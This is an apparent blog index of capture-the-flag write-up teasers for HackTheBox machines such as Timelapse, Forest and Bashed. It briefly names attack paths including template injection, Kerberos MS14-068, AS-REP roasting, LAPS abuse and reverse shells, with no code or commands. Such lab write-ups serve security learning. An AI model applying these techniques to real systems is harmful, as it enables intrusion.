Category: Write-Ups
-
Timelapse – HackTheBox
Timelapse was a relatively easy ‘Easy’ machine that required exploiting misconfigured SMB that led to a shell as a normal user where a service account password was discovered in powershell history. That account was configured to be allowed to read the LAPS password, which let us get administrative access on the machine. Scanning From the…
-
Late – HackTheBox
Late was an easy machine that required enumerating a subdomain to discover a Flask application used to OCR images. The application was vulnerable to Server Side Template Injection which allowed for remote code execution. This led to ssh access where it was discovered that a script run by root was in a writeable location from…
-
Mantis – HackTheBox
Mantis was a hard machine that focused on good enumeration and discovering an older vulnerability in the way kerberos authenticates regular users. We’ll first discover a mssql credentials, access the mssql server, and extract a domain user’s credentials. From there we will find the version of Windows Server is vulnerable to MS14-068 which allows for…
-
Curling – HackTheBox
Curling is an easy machine that required directory busting a web page to find a secret key to access a Joomla CMS admin panel. This allowed for code execution which led to our initial shell. From there we moved laterally by finding a hex dump, decoding it, and discovering a password. To achieve root access,…
-
Active Directory Takeover Pt II – User to Domain Persistence
In the last post, we discussed some specific enumeration methods for gaining entry into a machine in an Active Directory environment. Today, we’ll get a system shell in a few ways. Note this machine only had a brief glimpse into what’s possible beyond the initial shell, and we’ll be dealing with many other interesting methods…
-
Bounty – HackTheBox
Scanning I started with my standard nmap scan. Only one port opened, which I verified by running a scan against all ports as well. Enumeration – HTTP Port 80 There’s just an image here of Merlin with nothing else. Scanning with gobuster found something interesting. Unfortunately, this directory wasn’t working. No vhosts on the box…
-
Forest – HackTheBox
Forest is a much-hyped retired “Easy” Windows machine that deals with a wide variety of common AD attack vectors, both for initial entry and privilege escalation. Initially, I was able to leverage RPC to dump usernames from the domain, then ASRep-roast a service account. This was used to gain entry into the system, where I…
-
Bashed – HackTheBox
Scanning I started as always with an nmap scan. Enumeration Just port 80 open so let’s check that out. The dev folder looks promising. Wow, a phpbash webshell. That’s handy. Foothold – Shell as www-data Awesome, I should be able to get a reverse shell from this. It took a bit of tinkering with payloads…
-
Mango – HackTheBox
Scanning Started with my typical nmap scan. Enumeration – Port 443 Port 80 returned a 403 forbidden as seen in the scan, but 443 seemed worthwhile to check out. This search function just returned to itself. Gobuster revealed a subdirectory /analytics & this also worked from the primary page. This was a collected table of…
A Cyber Journey 